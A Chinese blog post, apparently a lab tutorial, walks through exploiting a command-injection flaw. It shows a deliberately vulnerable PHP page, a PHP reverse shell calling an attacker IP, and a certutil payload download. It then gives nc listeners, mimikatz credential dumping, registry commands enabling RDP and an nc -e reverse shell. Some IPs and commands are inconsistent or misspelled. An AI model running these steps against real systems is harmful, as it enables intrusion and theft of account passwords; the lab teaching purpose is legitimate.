RCE命令注入

已于 2023-06-21 15:04:14 修改
阅读量516 收藏 1
点赞数 1
文章标签: 网络 服务器 运维
于 2023-06-18 11:55:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/131268195
版权

学习参考链接:RCE(远程代码执行漏洞)原理及漏洞利用_rce漏洞原理_C1yas0的博客-CSDN博客

命令执行(RCE)面对各种过滤,骚姿势绕过总结 - 知乎

什么是RCE漏洞?

RCE漏洞,是指可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。

RCE漏洞也叫远程命令/代码执行漏洞

RCE命令分为远程执行命令(执行ping命令)和远程代码执行eval

RCE漏洞分类:

  • 命令注入
  • 文件包含
  • eval执行

RCE漏洞产生的原因:

 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。

windows系统命令拼接方式:

“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B

RCE漏洞复现:

1.复现环境

靶机               win11                          192.168.31.187

攻击机            win7                           192.168.160.135

get shell 机     kali2023                     192.168.160.133

2.漏洞复现

  • 靶机(192.168.31.187)创建1,php文件

<?php  
    header("Content-Type: text/html; charset=utf-8");
    error_reporting(0); //禁用错误报告  
    $a = $_GET["a"];
    system($a);
?> 

  •  攻击机(192.168.160.135)创建文件2.php

<?php
set_time_limit(0);
$ip="192.168.203.130";  #kali ip
$port=3939;
$fp=@fsockopen($ip,$port,$errno,$errstr);
if(!$fp){
    echo "error";
    }
else{
    fputs($fp,"\n++++++++++connect success++++++++\n");
    while (!feof($fp)) {
    fputs($fp,"shell:");//输出
    $shell=fgets($fp);
    $message=`$shell`;
    fputs($fp,$message);

    }
    fclose($fp);
}

?>

3.访问1.php文件

靶机(192.168.31.187)访问1.php文件,输入

http://192.168.31.187(靶机ip)/1.php?a=ipconfig

发现可以执行cmd命令

攻击机(192.168.160.135)也可以访问靶机(192.168.31.187)的1.php文件

4.漏洞利用

利用cmd命令远程下载1.txt文件

将攻击机(192.168.160.135)中的2.php文件上传

certutil -urlcache -split -f http://192.168.160.135(攻击机)/1.txt 2.php

攻击机(192.168.160.135)中访问:

在靶机(192.168.31.187)下的1.php查看上传的攻击机(192.168.160.135)中的2.php文件

http://192.168.31.187(靶机)/1.php?a=certutil -urlcahce -split -f http://192.168.160.135(攻击机)/1.txt 2.php

使用kali的nc监听3939端口

nc -lvvp 3939

攻击机(192.168.160.135)浏览器访问2.php文件

http://192.168.160.135/2.php

监听成功,成功get shell

当然,我们还可以上传mimikatz.exe文件来获取win7系统的所有账号密码

mimikatz.exe

privilege::debug

sekurlsa::logonpasswords

获取账号密码后,我们就可以开启远程连接服务了

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

如果开启不成功,则执行下面的命令

echo DO ALL IN CMD!
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

 net start termservice

然后再开启一次远程连接服务

最后使用主机快捷键win+s,搜索mstsc就可以打开Windows远程桌面连接了

nc反弹

向靶机(192.168.31.187)上传nc.exe文件

nc 192.168.31.187 -e C:\windows\system32\cmd.exe

kali监听

nc -lvvp 3939

访白鹿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
non_RCE
03-12
常见的RCE漏洞有SQL注入命令注入等。 2. **Java安全模型**:Java通过其安全模型来防止RCE,如类加载器机制、安全策略(Policy)、访问控制(Access Control)和沙箱模型。理解这些机制对于编写安全的Java代码至关...
redis-rce:Redis RCE 的几种方法
04-15
2. 输入验证:对客户端应用中的 Redis 命令进行严格的输入验证,防止命令注入。 3. 安全持久化:使用安全的持久化方式,避免因数据篡改导致的安全风险。 4. 更新与维护:定期更新 Redis 到最新稳定版本,修复已知...
crmeb多商户二开crmeb架构二开文档容器和依赖注入【2】
05-08 781
容器和依赖注入 ThinkPHP使用容器来更方便的管理类依赖及运行依赖注入,新版的容器支持PSR-11规范。 容器类的工作由think\Container类完成,但大多数情况我们只需要通过app助手函数或者think\App类即可容器操作,如果在服务类中可以直接调用this->app进行容器操作。 依赖注入其实本质上是指对类的依赖通过构造器完成自动注入,例如在控制器架构方法和操作方法中一旦对参数进行对象类型约束则会自动触发依赖注入,由于访问控制器的参数都来自于URL请求,普通变量就是通过参数
CTF_WEB学习-------------RCE命令注入
qq_45616570的博客
07-14 2915
CTF_WEB学习-------------RCE命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
RCE:代码执行与命令执行
最新发布
qq_68163788的博客
05-30 1181
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码或命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
【thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1507
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
RCE命令执行/代码执行总结
weixin_60719780的博客
03-12 470
exec执行command命令,但是不会输出全部结果,而是返回结果的最后一行,如果你想得到全部的结果,可以使用第二个参数,让其输出到一个数组,数组的每一个记录代表了输出的每一行,如果输出结果有10行,则数组就有10条记录。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。eval():函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。
(30)【RCE集合】RCE漏洞的原理、出现地方、相关命令、函数解析、利用详细的过程
04-09 2586
详细理解RCE漏洞
thinkphp 2-rce
weixin_51692662的博客
11-01 495
thinkphp 2-rce
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
在本文中,我们将深入探讨华夏ERP_v2.3.1最新版中的SQL注入与远程代码执行(RCE)漏洞的审计过程。审计的目标是确保系统的安全性,防止恶意攻击者利用这些漏洞对系统进行破坏或窃取敏感信息。审计通常遵循一系列步骤...
solr_rce:通过Velocity模板的Apache Solr RCE
03-08
2019年10月30日,国外安全研究人员放出了一个关于solr模板注入的exp,攻击者通过未授权访问的solr服务器,发送特定的数据包打开params.resource.loader.enabled,然后获取访问接口导致服务器命令执行,命令回显结果...
rConfig v3.9.2 RCE漏洞分析1
08-03
如果攻击者能够控制$rootUname的值,他们就可以注入恶意命令,这些命令将在目标服务器上执行。由于没有适当的验证和授权机制,攻击者可能在未授权的情况下触发这个漏洞。 第二个RCE漏洞位于search.crud.php文件中。...
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 268
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
Thinkphp 2-rce 漏洞复现(vulhub)
MDSEC的博客
08-20 214
首先,你需要在本地或虚拟机上搭建一个运行Vulhub的环境。你可以从Vulhub的GitHub仓库中下载并安装Docker和docker-compose工具,然后克隆对应的ThinkPHP 2漏洞利用环境。在浏览器中,你将看到一个简单的ThinkPHP应用程序。根据漏洞描述,你需要在URL中添加参数来触发漏洞。如果成功利用漏洞,你将在浏览器中看到返回的结果,例如当前用户的信息。将上述URL参数添加到应用程序的URL后面,然后按回车键执行请求。进入ThinkPHP 2漏洞利用环境所在的目录,打开。
RCE 代码注入
weixin_51075988的博客
03-14 502
RCE 代码注入 应用程序过滤不严,用户可以通过请求将代码注入到应用中然后由服务器去执行。 与 SQL注入漏洞的区异: SQL注入:将SQL语句注入到数据库当中去执行 RCE注入:直接将代码注入到应用当中由服务区端运行。 执行条件 1.程序中含有可执行 PHP代码的语言结构 2.执行语句为参数,且在客户端 可控 常用函数 eval() 将字符串当作 php代码 去执行 示例: <?php if(isset($_REQUEST['shell'])){ @$str = $REQUEST[
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
远程命令执行/命令注入命令连接符
箭雨镜屋
04-01 2352
一、理论 远程命令执行可以用到的命令连接符,windows系统和linux系统各有4个,其中3个是共有的,各有1个是特有的: windows系统:| 、||、&&、& linux系统:| 、||、&&、; 各连接符含义如下: | 管道操作符 可以把前一个命令的标准输出传输到后一个命令的标准输入 比如 a | b表示命令a的输出作为命令b的输入 在远程命令执行中,不管a的执行结果是否正确,b都可以执行 || 逻辑或 注意该命令有短路的情况 比如 a
DVWA通关攻略之命令注入
勿山几已
05-06 2238
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 1483
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
面试官问你SQL注入、XSS、文件上传、RCE远程命令执行漏洞如何进行回答
07-12
当面试官询问我SQL注入、XSS、文件上传以及RCE远程命令执行漏洞的相关知识时,你可以使用以下话术进行回答: 1. 面试官:请介绍一下SQL注入漏洞。 你:SQL注入是一种常见的web应用程序漏洞,攻击者通过在用户输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值